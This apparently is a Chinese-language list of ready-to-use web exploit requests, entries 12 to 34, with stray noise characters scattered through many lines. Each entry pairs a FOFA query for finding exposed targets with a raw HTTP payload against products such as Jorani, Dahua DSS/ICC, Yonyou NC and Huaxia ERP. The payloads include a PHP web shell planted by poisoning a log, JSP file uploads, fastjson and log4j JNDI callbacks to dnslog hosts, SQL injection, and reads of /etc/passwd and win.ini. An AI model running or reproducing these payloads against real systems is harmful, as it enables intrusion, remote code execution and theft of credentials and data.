% w/ k: B; y. n; k0 d$ y8 ?FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
  V, G# g& @4 {! X4 U: pGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
  w* Q% Q: U; u! D6 \" ^$ _Host: 127.0.0.1: d) N# A4 ?- D. B* C
Pragma: no-cache
8 b2 N* e3 y; x+ \+ _8 X# KCache-Control: no-cache( k5 x; D) x2 m" w4 Y$ o
Upgrade-Insecure-Requests: 10 c" [9 p  B9 K& O8 x8 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
! y2 m2 m$ F+ ^  H. X) i2 E7 NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- R" q* `9 O- x, hAccept-Encoding: gzip, deflate
+ r& l% x2 v6 s* oAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
) t6 l- {  o3 o; V# \Connection: close7 O7 O+ T- ?# \( _
" G9 u$ p4 }* z9 C$ X

: _3 ]8 o+ b# I$ b7 I! R12. Jorani < 1.0.2 远程命令执行6 N+ x2 ?8 G4 T% E. `+ Z
FOFA:title="Jorani"  E9 }, {2 h  K* q$ f  t
第一步先拿到cookie! M, ^8 f7 l1 P/ {* p  f4 t
GET /session/login HTTP/1.13 j- r0 V- o' k! \' c& C7 }- J! \
Host: 192.168.190.30; @& Z2 m! c/ W+ I
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36; B1 [7 `3 Q+ J- F" e
Connection: close$ ]' ^: Y+ E( u8 W# N
Accept-Encoding: gzip; Q% \! k: `" a; ^* M  ?4 d

* x( F! |/ P' |; }
4 Q" U# W9 n/ J% R# ^5 `; }响应中csrf_cookie_jorani用于后续请求0 j7 ?& X' Q  Y# c  c2 ~
HTTP/1.1 200 OK4 ?" D- p) T( H- t" g' E& m
Connection: close
1 q8 ]- k* j5 a5 r( OCache-Control: no-store, no-cache, must-revalidate9 {; a3 ?7 I$ }
Content-Type: text/html; charset=UTF-8
1 u! U. l& t7 a  {+ lDate: Tue, 24 Oct 2023 09:34:28 GMT0 x6 X+ Q! @. B+ N" v: b6 W
Expires: Thu, 19 Nov 1981 08:52:00 GMT* k9 z( o8 Q' n2 v# [. B
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT" n& _5 x: ?8 u" J
Pragma: no-cache
# @% l) F3 P; W5 z) ^2 N; U8 eServer: Apache/2.4.54 (Debian)
8 y; w8 X- Y1 g( DSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/8 I1 B2 [6 E. Q& s5 f2 E3 ]0 o- D
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
& r3 }! n. B, J; p. h9 P2 {) IVary: Accept-Encoding
4 ~9 A# s5 K0 _: W1 m- w& H: v1 {( x) }/ p5 u" N; e
' P( [; A  R* q- P* V
POST请求,执行函数并进行base64编码, r0 L7 g: b% `0 J9 [% k  {
POST /session/login HTTP/1.1# i$ I7 f* f0 J9 T# d
Host: 192.168.190.30
: j- h! i  o# b% ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
- H8 m' x: v5 u; b7 CConnection: close$ }9 T& [) j# }. u1 |
Content-Length: 252: z: P, @5 |# e7 \& w7 S, R6 q7 z" t
Content-Type: application/x-www-form-urlencoded
9 w# Q/ H' v! A# }& Q/ O+ zCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r' g0 g5 B4 K/ l- ^5 I& }5 L) A
Accept-Encoding: gzip
* v9 I; [& m) p8 o2 j
; D; p1 n" h# \; x. Ycsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor# V8 z8 A  X% ?5 r/ ]2 i& V

. r7 I6 Y8 s% d! f/ d1 f7 x3 Z6 `" L

  t* d0 g1 d7 |' v' R6 L向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
: g" g8 b: D1 E. b1 lGET /pages/view/log-2023-10-24 HTTP/1.19 k% ]- h* a6 j2 O! X) m- H0 B
Host: 192.168.190.30
/ K& B6 o" u! `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
6 ^$ S* P& ?4 BConnection: close+ _* I4 p+ E4 ?+ p2 Z/ i5 ?
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r! E0 v6 F7 Z2 I2 t; u# b. X5 H
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=# z, r( ?! o# F7 z; b9 r
X-REQUESTED-WITH: XMLHttpRequest- s9 i1 K$ x9 q" e7 R3 V. |% B8 W7 R
Accept-Encoding: gzip, N0 u) o9 c0 n, @# p2 L

3 j- S4 q; N" I# N0 J4 q7 s1 B
; R* a: w4 H* |) H13. 红帆iOffice ioFileDown任意文件读取
0 \6 {5 Q# U+ e8 y) P1 wFOFA:app="红帆-ioffice"4 {9 w* C/ C. N3 q* Z1 V/ o! r
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
; T" |6 R5 m; t3 L3 ?/ \Host: x.x.x.x
5 b( b6 d! s4 g; A4 o. }: UUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.367 v2 o& j4 r7 o2 r. L
Connection: close6 o  h# z6 x0 k* N
Accept: */*
& y' R" N  V5 V) FAccept-Encoding: gzip1 Q* q" `9 {" y7 [5 |

- a) r' y/ C& j  @; e; G, L" e# z; c( y" M! v4 E# T& w. K! e
14. 华夏ERP(jshERP)敏感信息泄露
  z* B6 ]& ^7 Y4 E+ \: \FOFA:body="jshERP-boot"
. P+ V/ {" r' u( y: ^泄露内容包括用户名密码
& M4 V9 P; `1 O8 |GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
! H* m3 P# ?9 ^7 P& T% X1 H/ b6 H1 jHost: x.x.x.x8 `0 H# Y' u0 p1 n4 I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
  ?/ f. v0 B2 r* |5 U, E$ XConnection: close- G: L5 S. p, W% i' O* K
Accept: */*4 I& U: A. s" f- F0 q
Accept-Language: en
( B0 |8 K9 ^8 I* |/ {Accept-Encoding: gzip
( t, o; h( P0 y5 C
: \; U2 v& ~9 B0 m- x, _' d
. b3 \2 g; }* n1 ?15. 华夏ERP getAllList信息泄露
( i! {, q+ y0 S4 w; {) Q' k# u3 VCVE-2024-0490
$ W; u* u2 L( i8 j* @, Q0 [/ YFOFA:body="jshERP-boot"% p, h+ r6 }6 ^; E8 {% |8 ]
泄露内容包括用户名密码
" l% C" ~7 p" g% X# i2 h0 jGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.13 R: F5 v6 J4 {/ O
Host: 192.168.40.130:100
# c9 ~% Y: z8 @$ g) g' Z* MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
" V3 q* ?( i) L+ g& rConnection: close& v# _. w% C9 X
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
" A+ U' H( M; c$ Z% ]7 _% |+ E# UAccept-Language: en. P: |/ c$ n7 c/ n
sec-ch-ua-platform: Windows& c" F' a$ M# m. L
Accept-Encoding: gzip. I9 r1 F- r  |3 b. t+ _9 c

0 S9 M, o3 C5 \9 P/ X4 K8 ~! w4 s: S/ t& W! O  h# z
16.  红帆HFOffice医微云SQL注入- d; D& _: \+ m" P& Z$ X
FOFA:title="HFOffice"" [. L9 d6 X7 d* S1 h! v! U0 P
poc中调用函数计算1234的md5值
  d# f, O) t) y3 nGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
+ I6 A' Z" k3 E9 q5 o2 e" m+ ?4 |Host: x.x.x.x  L# W3 k1 B8 j
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.366 U; |. p- h, m& a
Connection: close
  ~! B+ T% w8 M. l5 ]+ oAccept: */*# \2 d3 T/ z3 p5 e' e
Accept-Language: en
) V4 G9 w8 x( K9 I" T. mAccept-Encoding: gzip$ V! a$ `) h* L" g, w9 q
' f  _6 R% l1 R) O2 X3 l0 @
! y& L* W5 F2 Q' \7 Q+ O* }: A
17. 大华 DSS itcBulletin SQL 注入+ h8 e+ H: U7 h3 ?! @2 I  a0 e
FOFA:app="dahua-DSS"
& h$ V, B+ r% s/ t7 P' FPOST /portal/services/itcBulletin?wsdl HTTP/1.1/ [" z" _- v% _7 p3 H
Host: x.x.x.x; l( P3 e0 t* p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ E9 z5 ?4 M# S9 Y7 I+ fConnection: close8 b- C5 X, z2 V( f2 j! m
Content-Length: 3457 `1 D: q$ b6 s" D% R" v& h' h' g4 \; v
Accept-Encoding: gzip8 s* i% y9 y; v- u4 [

; u6 M+ z7 T: ~; ]$ r  k<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>! d2 A+ g7 W6 Y0 e, D; `' e6 D
<s11:Body>
3 a+ p1 x$ r2 g. w  a& ~$ {    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
7 Q5 B! h: c( a      <netMarkings>
8 O& C; Z; p. a% `       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
( a- M/ _: ~. H6 b% B% V7 U      </netMarkings>
* ?% x2 y# \4 k+ b    </ns1:deleteBulletin>! B! P: u* y& J7 J& V
  </s11:Body>
$ _: H5 s7 l% x7 w/ Z0 x0 B0 ?</s11:Envelope>
6 ~/ ~) v" S6 [+ x/ n
) H/ m/ N  X' I0 I! T
7 R3 o) k: a1 a1 w, A% d6 T18. 大华 DSS 数字监控系统 user_edit.action 信息泄露$ ^. j; _' U* k; M7 i) n
FOFA:app="dahua-DSS"
2 L$ W( T, [- A! v" hGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
* K" J7 H: U% c  X4 xHost: your-ip
. [7 }$ t0 l2 z' n( n0 I: |% WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ q& d. ~. k" X7 NAccept-Encoding: gzip, deflate
8 D( E, F5 @) Y/ c4 \Accept: */*
7 U  Z1 e! x+ L$ u4 D/ M* eConnection: keep-alive
8 o+ W  V: w/ R# m3 s
- J. F6 E! ~' @9 q, v
- |' ]& {$ u/ @+ c
9 u' Y, t0 B% h  P! R19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
* l2 i9 W8 H6 P6 n( i2 UFOFA:app="dahua-DSS"
- A5 {5 ]& L# nGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1: a; H/ D: f/ R7 k
Host:2 d  E2 A% \( M( |: z
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36% a) u- b6 s, Y1 `
Accept-Encoding: gzip, deflate
; P* w$ |9 F7 d- }. W2 WAccept: */*
3 S0 S4 l3 v' ]! I" l3 cConnection: keep-alive" d  r0 K- Y: C% o# t. ~
1 w' n& E. {7 t3 A4 e
; i" Z5 i" R8 T" y; Q
20. 大华ICC智能物联综合管理平台任意文件读取; a1 O/ D6 y* A& i4 t0 ~- {8 i
FOFA:body="*客户端会小于800*"
0 U/ ]: q$ w0 @0 C8 b3 }% MGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
+ \7 W" ^" Y8 U  \& A" sHost: x.x.x.x
7 `: v* |3 x3 \7 q0 E: e3 R& |User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ T; H2 @; ]" h/ S( |' g+ [1 RConnection: close
! |$ Z: n  g3 ^5 R' t, ~Accept: */*
& ~9 k" S3 C$ S' f+ a: xAccept-Language: en8 X& m) j9 X6 L- H3 \
Accept-Encoding: gzip( {0 y+ \# r4 N$ E1 @8 J4 ?6 E! i, c- N
3 q, n" D" d9 S& F0 x) c& ]; E
  [$ \9 {' e5 s5 m
21. 大华ICC智能物联综合管理平台random远程代码执行4 t% T% X; T! e3 T5 r. ]( K
FOFA:icon_hash="-1935899595"
2 B7 u' w8 O( o& C, h$ N  h6 F$ OPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1/ ~/ \5 J0 k! q
Host: x.x.x.x, s; ?+ \: n5 f( y4 U; |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 Y0 P9 O( {' h- o
Content-Length: 161: M+ x- B7 m- R- d4 G, [2 O- x
Accept-Encoding: gzip2 l- m* p1 n+ U3 K) I5 N3 c) ]
Connection: close0 ?; e3 i0 I$ M7 [; d* }+ J7 n
Content-Type: application/json;charset=utf-8
. H; O: h* p: R" _/ v9 X
: q0 ?3 P. u. G/ s" S4 C; b: S{, t! T$ S6 W# h( g: s+ b
"a":{6 f6 e. ?# H$ I" Z( d/ ]
   "@type":"com.alibaba.fastjson.JSONObject",
, \" R* ]8 L* W& @/ t    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
$ t3 C. l  @: S5 D2 F7 c  }""
0 Y/ A+ T& K# N* M. D}9 }; c1 G) z3 m
. L& Y) m/ D0 h" R

. \, K" O# v$ U% p22. 大华ICC智能物联综合管理平台 log4j远程代码执行
7 T4 T: j0 q+ L; i3 S0 wFOFA:icon_hash="-1935899595"
/ {  T) [, v( Y# q: k+ V! {, x# tPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
. E7 M/ A" G7 o2 c  ~  E$ QHost: your-ip
- K, U6 ^, L) M' _1 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" W+ p8 R( T; n; @
Content-Type: application/json;charset=utf-8: N: k; y. C0 b$ A/ y9 v/ X
3 Q$ E  Q( |* k+ K& `- T+ x
{
% s3 M1 V# G2 w9 ["loginName":"${jndi:ldap://dnslog}"* |/ B; X; x. H- |& V+ e( Y
}+ I) @' O3 I* q: p, G$ L/ u
5 q3 u" t: f" a' F6 ^% b

8 [) n6 E9 y! m7 o8 w) [
; w9 J; I3 i) m0 P. A. I23. 大华ICC智能物联综合管理平台 fastjson远程代码执行6 p) b& i9 S- X9 I5 o) J! d
FOFA:icon_hash="-1935899595"9 b: `) N. |% \
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1& p$ h% y  y0 K% t1 s: w0 ~
Host: your-ip3 E; u! r9 c. V4 q% `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" g& ]3 ?( s8 y8 c" o
Content-Type: application/json;charset=utf-8
8 {, ~6 Y5 G7 M& a/ Q0 Q) F9 [+ YAccept-Encoding: gzip
: y! V$ w6 M9 }. c; Z7 x$ h8 oConnection: close, U4 B+ [3 [  A% n
) n+ h# N3 M# L2 D- m0 [7 o" \3 G2 I5 }
{/ {; _, ?; M* N' ]- |
    "a":{
6 d# b; d% E3 J; j' G1 I        "@type":"com.alibaba.fastjson.JSONObject",
; x! a% _% t$ k3 f) I       {"@type":"java.net.URL","val":"http://DNSLOG"}( @% {. p: H) @: q5 y. z
        }""
+ X2 s- r. K4 k}- O  Z' q/ F% u# r: @; G! K. a: [  Z

2 @$ ^6 j. r/ A) r5 X
8 b( v# H$ [% \0 y& k8 I( i. A4 k24. 用友NC 6.5 accept.jsp任意文件上传
/ ^" V$ C# T/ `* N! x, X/ j' |FOFA:icon_hash="1085941792"
* U2 `8 F' Z9 U, I6 a% \/ VPOST /aim/equipmap/accept.jsp HTTP/1.1
- o5 x6 `( u8 ?8 c: LHost: x.x.x.x9 k- J' U, Q( x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36' X1 m8 X  w/ i2 }9 H' Z) s
Connection: close
" L5 E0 E/ S* i8 H% ~. _Content-Length: 449
# j) k3 o6 r, _! yAccept: */*2 E* C' n* @! N$ W
Accept-Encoding: gzip" T4 @  B% _; m. ?4 P) h4 l
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
6 C5 @6 W! M1 b, x; ?, u/ I
& J9 z8 {0 r8 P7 e1 f5 R+ G( T; t-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc8 i$ V; w2 D" O5 a
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"( |. v" M: x2 d' R, @8 ^
Content-Type: text/plain
! ^1 I3 J' k- ^8 d9 N! p% X6 j; Y/ I. p
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>0 @* K. M- x% Q2 z' ]0 s) O$ C% j
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc$ b1 J) f, {% _/ K
Content-Disposition: form-data; name="fname"
9 b& i0 U6 p6 X* X+ j* w
! D5 m+ y# h  J& G& b1 ]\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
. B' x7 W  l& F+ z# f9 M8 U* x-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--( T/ j. H3 a, C! Y$ E) ]6 r8 C+ y$ E' f

- u5 y2 @  r& H  l6 p' z5 q9 S; F9 U- a# [2 d1 A
25. 用友NC registerServlet JNDI 远程代码执行
) K& ^  R! u3 ~; SFOFA:app="用友-UFIDA-NC"3 R' c- Z' Y; m
POST /portal/registerServlet HTTP/1.1; l! J5 s3 c3 p% ~4 T
Host: your-ip
) z0 n: O* _0 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
7 F* |7 B" O5 F& K+ e6 z' UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.98 Z1 [) W$ ?( ^: N, Y, G" E
Accept-Encoding: gzip, deflate
/ G  W6 u5 c/ M- h9 }( l" {8 W  }Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.61 D7 u7 O4 M8 f* E3 c3 p
Content-Type: application/x-www-form-urlencoded* R+ x: P9 F, Q8 V; P" _+ |2 X: @. ]
1 D% R; W; A8 h5 j$ y0 x
type=1&dsname=ldap://dnslog
; u* w: V* p6 K/ R* v+ Z, _) m3 V4 i+ r% Q+ C$ n
; y+ n  k! b2 z) d# C- j

7 U0 c- a: C% @/ @. @26. 用友NC linkVoucher SQL注入
- S; j% s' s; Z' ]FOFA:app="用友-UFIDA-NC"
1 i$ y0 o6 Q2 p+ f8 tGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
  R! d3 @- g0 F" q% rHost: your-ip
% ?1 t. {1 a$ q; p! Z  [5 z7 Q7 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% i+ b/ e& h5 N: gContent-Type: application/x-www-form-urlencoded
8 H2 V$ b; \1 e+ gAccept-Encoding: gzip, deflate
, \2 z6 e8 U6 D9 a- _& @; EAccept: */*! [( f( ~; Y  A
Connection: keep-alive
% P4 U, X/ _' W! _  z: p6 I
" O& f/ Z0 F$ m7 T' K+ ?! Q. N# Z7 K1 v0 ?1 W6 u5 k& z) Q
27. 用友 NC showcontent SQL注入8 K  X$ V# n& H: z  ~( ~' E8 q
FOFA:icon_hash="1085941792"3 v; d/ \# @; s& p/ w$ M
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1& o+ _' w# a  ]6 E+ g/ v8 e
Host: your-ip
/ ~" P) z) z$ a0 f" t2 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 q# F9 b( T' Z+ E" u7 M
Accept-Encoding: identity  b  \) W* D6 w# b9 s
Connection: close# ~# q9 Y  ]+ C! C  H/ R9 X
Content-Type: text/xml; charset=utf-8
2 K  r; r( S0 F; i
4 p6 x  \# c) i) q! o* c
+ f3 d1 \0 q! W0 P% j28. 用友NC grouptemplet 任意文件上传4 H! M# F! S; q; U; B9 G' w5 I/ e
FOFA:icon_hash="1085941792"
" r/ r- `& q: L' I. G2 HPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.10 E: X: f6 I5 X0 Y5 o9 [) Q
Host: x.x.x.x
- V( G8 Y" E, BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
; @: s) g" Z% i9 M* x" L3 l1 zConnection: close% X7 Z5 A9 {$ H
Content-Length: 268
& J# r& V/ |, R) `Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk( G, i- L2 l. o& ^$ K* Y: |9 n
Accept-Encoding: gzip$ y7 s/ g2 r% n/ Y1 ~' G

. r: m4 l$ m  O6 N9 r------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk9 u/ w. a2 A7 h
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"3 K6 W* p  W6 o
Content-Type: application/octet-stream
5 ~- h" \& W0 Z$ z( u) G5 `3 Q
7 d$ Y9 p& ?6 p; t0 C) e5 s<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
1 Q6 r) c% T7 c" z% J' M; ]6 |------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--: a0 ], Y- {$ n' D$ S

6 U* q' E! j( a9 i2 B
7 o6 C# a* G; ~+ t/uapim/static/pages/nc/head.jsp& ?2 X: ?3 I9 e8 d  d
+ ?( k! r0 V" X/ X
29. 用友NC down/bill SQL注入
. ~. M% _, N6 l1 \2 G% o/ d- OFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif", {2 q8 b  U# B& P
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
# f9 v( l; [% |0 x1 CHost: your-ip
- A6 w4 |/ G6 P! x; E( n3 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 b: T7 O2 b% t6 m; V
Content-Type: application/x-www-form-urlencoded
6 s& Y% @% U" d) `, N: f5 iAccept-Encoding: gzip, deflate
1 c4 C9 O' u7 d9 w- _3 bAccept: */*  l4 g. T! I0 v, g3 e# \; ~
Connection: keep-alive$ `- x( U+ O2 c- D$ `& I

# Q* ]8 }, s/ v+ |! E  Q& p
/ d: g9 i  A) q4 ~# H  h+ f4 Y& `30. 用友NC importPml SQL注入7 [" A1 F% d! Q% K# T" B- |2 _. m: E
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
) {. e7 H& a8 ~: @' }, n$ ^( B6 LPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
+ v. A  \: L# y' u4 D- LHost: your-ip& r' Q  I  G1 m
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V3 Z2 n( u) y8 b1 ~/ O3 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
7 |6 j( I& T4 |7 b# f& KConnection: close
  r+ {: K2 i* S7 V  Z0 D% ^5 l2 ?1 N9 o! d! l. v( @
------WebKitFormBoundaryH970hbttBhoCyj9V, C* X$ a5 Z) B1 |" Y3 [( B7 j
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
6 v) Q+ I) D4 B# f% @  t* DContent-Type: image/jpeg
( x: A9 H" o2 ^+ F------WebKitFormBoundaryH970hbttBhoCyj9V--4 P& s: l# K$ b
0 b3 j" y4 C+ k) x5 w" R; V1 H( g

, {% Z9 D' I- J7 o( E: h1 {2 r31. 用友NC runStateServlet SQL注入
- Y2 @) F6 g) i: m6 ~version<=6.5
5 g' v4 _$ }- o) Z. KFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif") c0 ?7 j1 I' l. U
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
/ X$ `5 A/ I2 P' l; r( i) [' e) mHost: host
( D9 L$ ^! c5 V$ iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36/ Y. ^8 }. Y' D" D# B
Content-Type: application/x-www-form-urlencoded
+ c! P: y+ ]' }0 O0 U  V: W& i& J
2 s; t2 l3 |9 j$ n  d' [
32. 用友NC complainbilldetail SQL注入
# ?$ \: ]; @! T' n* b2 }version= NC633、NC65
% ^2 G. O: j5 E' G! xFOFA:app="用友-UFIDA-NC"
# {4 _9 i( Q6 |% NGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
& ~3 ~3 o3 |; p7 Y2 `* |% f9 I# BHost: your-ip
3 L( b& ^  d9 l" ~" ^0 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 k. `; l, H" K, n6 r. t% d7 e) NContent-Type: application/x-www-form-urlencoded6 y1 }% e. m1 o& F8 Z7 v" V
Accept-Encoding: gzip, deflate2 ]( c5 x8 Z0 n+ I. s
Accept: */*8 q& S, E. n9 A2 w) |
Connection: keep-alive
- Z; C2 e9 h; T2 m& p
6 q1 X2 R) z8 }3 _" r4 f6 i+ x
33. 用友NC downTax/download SQL注入6 g4 c) l, j+ K
version:NC6.5FOFA:app="用友-UFIDA-NC"
0 Z, s2 v( F& m# H+ G+ w2 bGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1; ^4 y1 ]" ?  x3 S
Host: your-ip( m/ H* l% O3 f8 z; R8 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 h9 b4 O4 n6 s3 r; S; r$ Y6 d7 NContent-Type: application/x-www-form-urlencoded) D$ X' g' N% s5 u
Accept-Encoding: gzip, deflate& {) D; ?9 x% g8 `2 H" j2 _3 O4 X" n
Accept: */*
$ m# r# ?9 {" W+ U0 l6 X% `( QConnection: keep-alive% o% t+ H, \6 a! d  k) K7 i

; Y6 u! C: h6 G, o" X: {) f. T# `' q3 E+ c; L1 T0 Y( u$ C
34. 用友NC warningDetailInfo接口SQL注入* I( ~5 l& @# Q2 V* e) w
FOFA:app="用友-UFIDA-NC"" C$ A) g: @9 _4 f  h8 B
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
0 C5 H; @& g- B- wHost: your-ip
% m8 t3 v5 e+ s! y7 k  NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
